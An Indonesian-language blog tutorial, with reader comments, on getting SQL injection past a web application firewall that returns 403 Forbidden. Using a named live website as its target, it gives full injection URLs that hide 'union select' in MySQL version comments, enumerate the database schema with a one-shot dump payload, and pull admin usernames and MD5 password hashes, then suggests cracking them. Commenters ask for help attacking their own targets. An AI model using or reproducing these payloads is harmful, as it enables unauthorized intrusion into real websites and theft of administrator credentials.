Cara Bypass Sql Injection 403 Forbidden
Mumpung ada target nih, di postingan kali ini gw mau ngejelasin tutorial bagaimana Cara Bypass Sql Injection 403 Forbidden.
Oke langsung saja, disini gw udah ada target dan berikut target gue,
https://tisplanet.com/service-item.php?id=3
Di penjelasan kali ini gw ga akan ngejelasin sedetail mungkin.
Karena ditutorial ini mungkin kalian sudah pada paham basic sqli, jadi langsung ke inti permasalahannya saja ya.
Oke baiklah kita lanjutkan, gw asumsikan udah ke tahap union+select
Gue disini setelah melakukan order+by untuk mendapatkan jumlah column dan ketika mau masukan query union+select ternyata malah kena security waf 403 Forbidden.
Untuk cara bypassnya cukup kita menambahkan beberapa karakter mysql-comments. Di target gw disini yang kena waf di union+select jadi kita tinggal menambahkan beberapa karakter mysql-comments,
Contoh,
union+select
Kita tambahkan mysql-commentsnya jadi,
/*!union*/+/*!select*/
/*!12345union*/+/*!12345select*/
Nahh jadi contohnya seperti ini,
https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,4,5,6,7,8--+
Lihat digambar dibawah ini, bypassed.
Terus kalo udah tau angka magicknya yang keluar, selanjutnya tinggal masukan diosnya. Gue pilih angka 4 untuk dikasih dios berikut perintah lengkapnya,
https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),5,6,7,8--+
Kena 403 Forbidden lagi anjirr mari kita bypass.
Oke berarti yang harus dibypass adalah diosnya, karena tadi pas mau dikasih dios malah kena waf 403 forbidden.
Untuk bypass diosnya sama seperti waktu bypass union+select tinggal menambahkan karakter mysql-comments. Lebih jelasnya seperti ini,
https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@),5,6,7,8--+
Bypass sukses, lihat gambar diatas gan.
Selanjutnya tinggal ngedump username beserta passwordnya seperti ini,
https://tisplanet.com/service-item.php?id=-3'+/*!union*/+/*!select*/+1,2,3,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@),5,6,7,8--+
Nah tuh keluar user dan passnya tapi password masih terenkripsi jenis md5, jadi harus dicrak atau hash biar bisa mengetahui password yang aslinya.
Oke sekian dulu dari gue, semoga bermanfaat.
thanksssss broo
ReplyDeleteOk sama2 bro.
DeleteTq Mank >///<
ReplyDeleteOke samasama mhank.
DeleteKak cara nambahin mysql-coments gimana. Soalnya itu sama sebelum bypass dios dan sesudah bypass dios nya di blog nya kak
ReplyDeleteYa tergantung dibagian mana yang harus dibypass tinggal dimanin aja.
ReplyDeleteTOLOL
ReplyDeleteDih ngegas.
DeletePuyeng ngetik 0xblablabla :(
ReplyDeleteDicopy paste aja gak usah ditulis biar ga puyeng haha.
DeleteMakanya pake hackbar :V
DeleteHehe iya bener.
DeleteBagian mana yang belum ngerti, saya juga binggung.
ReplyDeleteBagi nomor wa pak
ReplyDeleteOh maaf saya lagi bales, gak punya wa bang, fb aja ada kok.
Deletegue demen klo yg punya blog interactiv gini,
ReplyDeletelanjutkan mas brow,
gue pantau ja,belum ada yg demen artikelnya
Maturnuwun mas brow, hooh ini belum ada yang demen hehe gkpp mas.
DeleteKakkkkkk Dios site yg mau ku Inject GK bisa ke bypass..
ReplyDeleteOrder by sama union select nya udah dapet ..tp bypass dios nya belom